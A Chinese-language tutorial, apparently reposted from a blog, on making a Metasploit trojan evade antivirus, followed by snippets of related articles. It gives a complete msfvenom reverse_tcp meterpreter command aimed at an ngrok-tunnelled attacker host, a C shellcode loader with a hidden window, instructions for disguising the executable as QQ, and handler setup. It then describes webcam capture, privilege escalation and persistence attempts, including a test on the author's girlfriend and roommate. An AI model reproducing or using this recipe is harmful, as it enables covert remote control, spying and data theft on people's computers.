1. 程式人生 > >Metasploit的簡單木馬免殺技術及後滲透面臨的問題

Metasploit的簡單木馬免殺技術及後滲透面臨的問題

一. 配置ngrok準備內網穿透

內網穿透的必要性和原理就不用說了,直接說操作。首先到ngrok官網去註冊一個號,國內也有一個sunny ngrok,但是我用了幾次全失敗了,所以推薦國外的,網址是:https://ngrok.com/。

我註冊的時候面臨驗證碼刷不出來,所以建議選擇用github賬號登陸就好。登陸好之後就在kali下載好對應版本的客戶端。下載好之後你需要在kali上用他給你的憑證進行登陸——命令列輸入

./ngrok authtoken (你的憑證字串)。

憑證可以在官網上覆制。

然後接著輸入:

./ngrok tcp 1234

這的1234是你本地的埠,出現如下畫面說明你成功了,然後讓他一直開著。

左邊就是給你用的埠,右邊就是你本地的埠

然後你可以通過ping這個給你的網址得到IP,這個是ping不通的,不過可以得到IP就可以了。這個每次重新穿透的時候都會更換遠端埠,這是比較egg疼的,不過免費嘛,算可以了。

二.木馬的偽裝與簡單免殺

木馬面臨的最基本的問題就是免殺,如果不能免殺,被防毒軟體發現,其作用幾乎為零,至於怎麼感染別人,就得看你的忽悠能力或者USB的方式,但是首要的應該是免殺。

我採用的是比較簡單的免殺方式,依靠msf生成的shellcode免殺。

在命令列輸入:

msfvenom -p windows/meterpreter/reverse_tcp -a x86 --platform windows LHOST=52.14.61.47 LPORT=13098 -e x86/shikata_ga_nai -i 15 -b '\x00\' PrependMigrate=true PrependMigrateProc=svchost.exe -f c > /root/Desktop/shellcode.c

這裡的paylload選擇windows/meterpreter/reverse_tcp,LHOST和LPORT分別填ngrok給你的網址和埠,-e x86/shikata_ga_nai -i 15是用-e x86/shikata_ga_nai編碼15次,而PrependMigrate=true PrependMigrateProc=svchost.exe使這個程式預設會遷移到svchost.exe程序,自己測試的時候不建議到這個程序而是其他的持久程序,這樣別人開啟之後就無法再常規的去關閉回連的會話。你還可以使用windows/meterpreter/reverse_tcp_rc4這個payload,對會話進行加密,增加免殺能力。

相信大家都試過,直接輸出exe檔案就算注入其他軟體和進行編碼n遍也會馬上被查殺出來。多次測試發現用x86/shikata_ga_na編碼超過12次以上再通過shellcode編譯出來都能免殺。

如下圖你的桌面會有一個shellcode.c檔案

將其移到 windows,用記事本開啟會有 :unsigned char buf[] =”一長串數字”

接著就開始編譯木馬,我使用的是vs2015

下載連結:

https://pan.baidu.com/s/1BgxZeCTZoFvpm_lhxcRXCw 密碼:bchi

在visual studio下新建一個c++的win32專案將以下程式碼模板複製進去,在把你得到的shellcode那長串數字複製到shellcode的位置。

#include<stdio.h>#include<windows.h>#pragma comment(linker,"/subsystem:\"windows\" /entry:\"mainCRTStartup\"")                        //去除視窗unsigned char shellcode[]= (這裡就是shellcode)void main(){ LPVOID Memory = VirtualAlloc(NULL, sizeof(shellcode), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE); memcpy(Memory, shellcode, sizeof(shellcode)); ((void(*)())Memory)();}

編譯方法網上有很多種,這個時候已經可以編譯了,但是我們還可以對圖示進行更改偽裝:右擊你的專案-→新增-→資源-→圖示-→新建,再用電腦的搜尋查詢*.icon,找到 QQ的圖示找到你這個專案的資料夾下會有一個1icon.ico檔案,將QQ的圖示改成1icon.ico,拖進去替換掉原來的那個圖示檔案

然後vs平臺就會出現下圖:

這個時候你再編譯出來就會是一個QQ圖示的木馬。具體情況下你可以以此方法任意改圖示再重新命名,使你的木馬更加具有迷惑性。

我們再使用國內普遍的360防毒軟體測試一下效果,證明可以免殺了

只要在不影響shellcode的情況下,你可以對這個程式再增加擴充套件(就看你的c語言功底了),比如這裡使用#pragma comment(linker,”/subsystem:\”windows\” /entry:\”mainCRTStartup\””)隱藏程式視窗,並用這個程式取代快捷方式,再通過這個程式呼叫原來真正的程式基本就神不知鬼不覺了。

其次就是建議各位在測試自己的木馬時一定要關閉雲端上傳功能,360會收集可以軟體,上傳雲端檢測,然後備份通殺,所以你的木馬沒準今天還可以免殺,明天就全國聯保了。心疼被吃的一個馬。

三.meterpreter後滲透功能測試

先配置好監聽端

use exploit/multi/handlerset payload windows/meterpreter/reverse_tcpset LHOST 127.0.0.1set LPORT 1234exploit

注意LHOST和LPORT配置為之前和ngrok繫結的本地的埠!!

然後等待別人執行我們的木馬。如下就是成功了。

然後我讓遠在異地的女友和我的室友幫我測試了一下,結果也是成功的,具體你們也可以試試。這個時候你基本可以操控很多功能了。

但是我又發現360的行為檢測會阻止meterpreter許多功能,簡單的getsystem提權絕對失敗,通過雜湊傳遞和假冒令牌的方式提權,都會被報可疑程式在呼叫驅動,甚至拍照都會報可以程式在呼叫攝像頭(部分電腦不會報)

然後msf會收到一張360的調戲圖:

但是你接著第二次使用:

Webcam_snap 1

又不會報並且拍照成功(很奇怪)

再至於常規的持久化控制命令不是失敗就是會被360查殺

並將我們的木馬曝光(十分危險),而如果嘗試關閉360的程序則其核心程序又無法關閉,又嘗試執行360的解除安裝程式,結果又報可以程式在呼叫360部分檔案,非常惱火。

據說通過刪除系統資料夾就可以解除安裝360了,不過不建議,因為那等於暴露了。

希望這篇文章能夠幫助大家的學習,但是這些技術僅供學習使用,切不可用這些技術做非法的事,合法上網從我做起

以上就是對於msf的簡單利用,我還是一個滲透學習路上的菜鳥,歡迎大家提出過程中的問題,或者為後滲透的問題提供解決辦法和思路,謝謝大家

相關推薦

Metasploit簡單木馬技術滲透面臨的問題

一. 配置ngrok準備內網穿透內網穿透的必要性和原理就不用說了,直接說操作。首先到ngrok官網去註冊一個號,國內也有一個sunny ngrok,但是我用了幾次全失敗了,所以推薦國外的,網址是:https://ngrok.com/。我註冊的時候面臨驗證碼刷不出來,所以建議選

Metasploit(msf)系列-木馬

    木馬檔案風險高,想要免殺需要用shellter工具捆綁下,但是處理後木馬檔案還是能被360檢測到攔截下來。 原理:        首先生成木馬檔案,然後將生成的木馬檔案與shellter免殺工具捆綁,然後設定監聽,將捆綁後的

使用shellcode打造MSFpayloadshellcode載入技術

0x00 前言    經常有同學提及MSF payload的免殺問題,其實除了Veil之處,還有另一種比較輕巧的方案可以打造免殺的payload,那就是shellcode。 0x01 從哪裡開始    shellcode是什麼,可以去drops搜尋學習,但這並不是本文的重點

Metasploit制作後門-----msfvenom

Metasploit 後門 msfvenom kali linux 真正全部免殺是不會的,部分還是可以,主要是介紹msfvenom。-----現在依然還有很多教學視頻、資料是使用之前的kali版本。隨著更新有些命令是不適應最新的kali的。(也是掉過坑的人)msfvenom集成了msfpayl

2017-2018-2 20179207 《網絡攻防技術》第十二周作業 技術

使用 一段 環境 修改 什麽 重新 分享圖片 系統 alpha 基礎問題回答 (1)殺軟是如何檢測出惡意代碼的? 基於特征碼的檢測 惡意代碼常常具有明顯的特征碼也就是一段數據,殺軟檢測到具有該特征碼的程序就當作檢測到了惡意代碼。 啟發式惡意軟件檢測 基於行為的惡意

2017-2018-2 20179205 《網絡攻防技術與實踐》第十二周作業 技術

百度 殺毒 .com 可執行文件 檢測 png inf win info 《網絡攻防技術與實踐》第十二周 免殺技術 msfvenom直接生成meterpreter可執行文件 kali ip:192.168.92.140 win ip:192.168.92.148 將

kali linux之技術

處事 黑客 制造 直接 tcp src 很難 流氓 -a 惡意軟件: 病毒,木馬。蠕蟲,鍵盤記錄,僵屍程序,流氓軟件,勒索軟件,廣告程序 在用戶非自願的情況下安裝 出於某種惡意的目的:控制,竊取,勒索,偷窺,推送,攻擊 惡意程序最主要的防護手段:殺軟

滲透之——Metasploit自定義收集登入憑證的滲透模組

轉載請註明出處:https://blog.csdn.net/l1028386804/article/details/86415478 這裡,我們以攻擊Foxmail 6.5為例,將嘗試對登入憑證進行解密,然後將它儲存到資料庫。 注意:執行這個指令碼的前提是我們已經經過一系列的滲透拿下了目

滲透之——Metasploit自定義讓磁碟失效的滲透模組

轉載請註明出處:https://blog.csdn.net/l1028386804/article/details/86383118 一個可以禁用Windows 作業系統上的指定硬碟的程式,這裡我們將指令碼命名為:disable_drives_by_binghe.rb。 具體內容如下:

2017-2018-4 20155317《網絡對抗技術》EXP3 原理與實踐

運行 log jar idt 連通 進行 all 結果 暫時 2017-2018-4 20155317《網絡對抗技術》EXP3 免殺原理與實踐 一、問題回答 (1)殺軟是如何檢測出惡意代碼的? (2)免殺是做什麽? (3)免殺的基本方法有哪些? 2.實踐 (1) 正確

2017-2018-2 20155230《網絡對抗技術》實驗3:原理與實踐

語言 code 編碼 病毒 div 就是 加密 網絡 殺毒軟件 基礎問題回答 1、殺軟是如何檢測出惡意代碼的? 殺軟檢測惡意代碼主要有三種方式: ①特征碼的檢測:殺毒軟件的病毒庫記錄了一些惡意軟件的特征碼,這些特征碼由一個不大於64字節的字符串組成,且是只有該病毒內

20155220 網絡攻防技術 實驗三 原理與實踐

基於 back 網絡攻防 lis 方法 由於 原理 使用 生成可執行文件 網絡攻防技術 實驗三 免殺原理與實踐 使用msf生成後門程序的檢測 首先我們對上次實驗生成的後門exe,利用VirSCAN進行檢測 然後我們利用msfvenom -p java/meterp

siglownetplayone木馬方法

發現的木馬體檔案:siglow.sys,siglow.dll,netplayone.dll,nethome32.dll四個。   現象:1、360升級異常;2、google搜尋木馬體檔名關鍵字,結果集異常,且360論壇的相關網頁全部開啟指向360主頁;3、卡巴與小紅傘兩款防毒軟體及

PHP一句話木馬Webshell變形總結

0×00 前言   大部分Webshell查殺工具都是基於關鍵字特徵的,通常他們會維護一個關鍵字列表,以此遍歷指定副檔名的檔案來進行掃描,所以可能最先想到的是各種字串變形,下面總結了一些小的方法,各種不足之前還請看官拍磚.   0×01 字串上的舞蹈     一

病毒木馬實戰第028篇:某APT攻擊的技術分析

樣本檔案基本資訊 本分析報告共涉及兩個樣本檔案,其基本資訊如下:   1號樣本 2號樣本 樣本名稱 處理籤(2018年)1304.pdf.hta 組織部幹部四處最新通

zl工作一個月技術心得總結

1. 在有狀態顯示的情況下,要充分考慮狀態的流轉,建立表的時候要考慮帶狀態顯示的問題。某個商品可能實際是一個狀態,但是在顯示的時候要是另外一個狀態,方便對該訂單進行後續的操作。 2. 一個狀態多個來源我呢提----當一個狀態有由多個地方流轉過來的時候,必須要考慮到訂單狀態流轉來源不同可能處理的結

360木馬mysql資料不能啟動

提醒:如果你電腦裝了mysql,然後你用360的木馬查殺,查殺之後mysql啟動不了,原因是360將mysql的一些檔案刪了同時還把mysql服務關了,所以裝了mysql之後最後別木馬查殺,這個恢復mysql特麻煩,360真流氓 恢復方法:在解除安裝360時會讓你填寫解除安

Metasploit筆記--技巧

0x01 防毒軟體防毒原理 目前的大多數殺病毒軟體採用的方法主要是特徵碼(signatures)查毒方案與人工解毒並行,亦即在查病毒時採用特徵碼查毒,在殺病毒時採用人工編制解毒程式碼。特徵碼裝載在防毒引擎中,用來對磁碟和程序進行掃描,尋找匹配物件 0x

C++ 引用計數技術智慧指標的簡單實現

一直以來都對智慧指標一知半解,看C++Primer中也講的不夠清晰明白(大概是我功力不夠吧)。最近花了點時間認真看了智慧指標,特地來寫這篇文章。 1.智慧指標是什麼 簡單來說,智慧指標是一個類,它對普通指標進行封裝,使智慧指標類物件具有普通指標型別一樣的操作。具體而言,複製物件時,副本和原物件都指向同一儲存

專案基本技術

資料庫設計 這個需要豐富的資料庫設計經驗。才能降低耦合度 明文兩次md5處理 。 避免使用者在密碼傳輸的過程中被劫持 JSR303引數校驗框架+Spring boot中的全域性異常處理 分散式session 這個超級重要 1。session同步 實現有點複雜 2。分